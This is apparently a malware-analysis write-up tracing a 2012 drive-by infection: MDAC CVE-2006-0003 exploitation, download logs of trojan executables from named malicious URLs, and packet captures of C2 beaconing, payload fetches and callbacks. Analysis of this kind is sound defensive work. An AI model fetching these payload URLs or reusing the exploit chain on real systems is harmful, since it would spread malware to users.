catch (e){
}
}
catch (e){
}
}
catch (errno){
}
document.write('');
setTimeout(end_redirect, 60000);
=====================================================
EXPLOITATION & INFECTIONS OCCURED (PE BASED ONLY)
======================================================
1. MDAC Arbitrary file download via the Microsoft Data Access Components (MDAC) CVE-2006-0003
ActiveX controls=BD96C556-65A3-11D0-983A-00C04FC29E36 Created adodb.stream w/shell apps
using msxml2.XMLh00p download below malware
using SaveToFile .//..//03ab326.exe to save malware
--user-agent="Mozila/4.3(X11; U; MacOSX)"
--cookies=on --keep-session-cookies --save-cookies mycookies.txt
--referer="h00p://74.200.211.205/SQeyUUzT/js.js"
"h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
--output-document="03ab326.exe"
--16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
=> `sample1'
Resolving ser.luckypetspetsitting.com... 198.143.159.66
Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 256,784 (251K) [application/x-msdownload]
16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
--18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
=> `update_flash_player.exe'
Resolving 4.icedambusters.com... 198.74.52.86
Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 256,784 (251K) [application/octet-stream]
18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS PREVIOUS DROPPED!
==============================================================================
NETWORK FULL ANALYSIS of Trojan, Backdor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
================================================================================
1) DNS : Standard query A rabbitharky.com
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
Standard query response A 198.143.159.66
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
2) h00p/1.0 POST: 192.168.7.84 ⇒ 198.143.159.66↓
POST /forum/viewtopic.php h00p/1.0
Host: rabbitharky.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 257
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
.....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
pH...v*].....1..jw`a.....<"....4
M.R,.._X..h00p/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 27 Oct 2012 08:17:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
GET /CaBPXFg.exe h00p/1.0
Host: SpringBackColorado.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:05 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdownload
MZ......................@.........................................
......!..L.!This program cannot be run in DOS mode.$.......PE..L...
R..P...............2.4...8......@........P....@....................
..............\......................................hw..x.........
...........n..........,............................................
........y...............................text....2.......4..........
........ ..`.data....3...P...4...6..............@....reloc..,......
......j..............@..B................U..]............U..]......
......U...H....H.F.P.=.......L.F.]....U..Q.E......E..h"@..P.F...]..
...U...E..M..H...].U...E..@.]......U......E..E..M..M..E......U...T.
F..E..X.F..
:
:
f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
..*.H..
........ ....o
s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
p....o..K..u..
...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
PoC:
--17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
=> `CaBPXFg.exe'
Resolving springbackcolorado.com... 64.29.151.221
Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdownload]
17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe h00p/1.0
GET /cXbAC.exe h00p/1.0
Host: 180degrees.org.nz
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:12 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode.$.......PE..L...R..P...
............2.4...8......@........P....@..............................
....\......................................hw..x....................n.
.........,....................................................y.......
........................text....2.......4.................. ..`.data..
..3...P...4...6..............@....reloc..,............j..............@
..B................U..]............U..]............U...H....H.F.P.=...
....L.F.]....U..Q.E......E..h"@..P.F...].....U...E..M..H...].U...E..@.
]......U......E..E..M..M..E......U...T.F..E..X.F..T.F..M...X.F..U..E..
M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E......U.;U.s..E...
:
:
f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
..*.H..
........ ....o
s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
p....o..K..u..
...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
PoC:
--17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
=> `cXbAC.exe'
Resolving 180degrees.org.nz... 66.117.15.147
Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdownload]
17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
5) h00p/1.0 GET weareseasons.com/7yoZf5.exe
GET /7yoZf5.exe h00p/1.0
Host: weareseasons.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:19 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
ETag: "b008a82d-67910-4cd05d3c57d54"
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!
..L.!This program cannot be run in DOS mode.$.......PE..L...R..P.........
......2.4...8......@........P....@..................................\....
..................................hw..x....................n..........,..
..................................................y......................
.........text....2.......4.................. ..`.data....3...P...4...6...
...........@....reloc..,............j..............@..B................U.
.]............U..]............U...H....H.F.P.=.......L.F.]....U..Q.E.....
:
:
I.q.M.B.d.J.3.Z.k.Z.F.U.9.S.K.g.W.6.T.u.2.g.h.B.l.2.L.Q.6.w.t.e.M.c.q.w.K.
s.M.Z.K.Z.9.m.A.2.q.i.h.R.7.Z.W.r.V.5.N.w.Y.p.f.n.t.Y.P.b.S.D.N.n.N.C.5.2.e
.F.o.n.I.W.k.M.Y.h.i.c.k.Q.M.j.H.e.9.p.H.G.f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.
N.W.p.U.v.r.Z.y.x.S.G0
..*.H..
........ ....o
s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
p....o..K..u..
...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
PoC:
--17:54:45-- h00p://weareseasons.com/7yoZf5.exe
=> `7yoZf5.exe'
Resolving weareseasons.com... 87.106.194.196
Connecting to weareseasons.com|87.106.194.196|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdos-program]
17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
SYN:
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
REPLIES:
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
:-)) LOLZ
7)SYN & ACK to Malware Host 195.169.125.228
195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
8) KEEP ALIVE DATA SENT TO 70.138.242.12
192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
-------
#MalwareMustDie!!! Crusaders Rocks!!
Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!